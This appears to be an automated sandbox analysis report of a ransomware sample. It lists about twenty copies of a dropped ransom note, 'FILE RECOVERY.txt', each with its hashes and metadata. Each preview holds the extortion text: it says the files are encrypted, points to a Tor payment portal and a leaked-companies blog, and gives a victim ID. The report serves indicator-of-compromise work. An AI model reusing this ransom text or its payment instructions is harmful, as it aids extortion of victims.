                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\DTBZGIOOSO\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\DVWHKMNFNN\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\HTAGVDFUIE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\JSDNGYCOWY\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\NIKHQAIQAU\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\ONBQCLYSPU\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\SQRKHNBNYN\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\WKXEWIOTXI\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Documents\XZXHAVGRAG\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Downloads\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Favorites\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Favorites\Links\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Links\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Music\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Pictures\Camera Roll\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Pictures\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Pictures\Saved Pictures\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\Videos\FILE RECOVERY.txt

                        Download File
